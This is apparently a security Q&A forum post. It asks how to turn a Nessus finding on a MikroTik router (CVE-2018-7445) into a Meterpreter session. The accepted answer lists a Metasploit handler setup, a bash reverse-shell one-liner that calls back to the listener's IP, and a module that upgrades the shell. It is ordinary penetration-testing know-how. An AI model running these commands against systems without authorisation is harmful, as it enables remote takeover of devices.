# Nessus found a vulnerability, but no corresponding exploit on Metasploit : How to run with meterpreter

Tags: exploit, metasploit, nessus

I ran Nessus on a local network, it found a critical vulnerability for the router:

`MikroTik RouterOS < 6.41.3 SMB Buffer Overflow`

(Vulnerability description : [Exploit-db](https://www.exploit-db.com/exploits/44290/))

But I can't find any corresponding exploit on metasploit for this vulnerability. On msfconsole did `search CVE-2018-7445` but got no result.

Is there any way for me to use the exploit on metasploit, with the meterpreter?

Answer (score 1, accepted):

Basically, you need to use the exploit in the exploit-db link to get a shell, then start a Metasploit handler:

```
use exploit/multi/handler
set LHOST [local ip address]
set LPORT 4444
set payload linux/x86/shell/reverse_tcp
run
```

Once the payload handler is running, you can make a reverse TCP connection from the router to get a session on Metasploit:

```
bash -i >& /dev/tcp/[local ip address]/4444 0>&1
```

Then background the session and use the module [`post/multi/manage/shell_to_meterpreter`](https://www.rapid7.com/db/modules/post/multi/manage/shell_to_meterpreter) to upgrade the shell to a Meterpreter shell.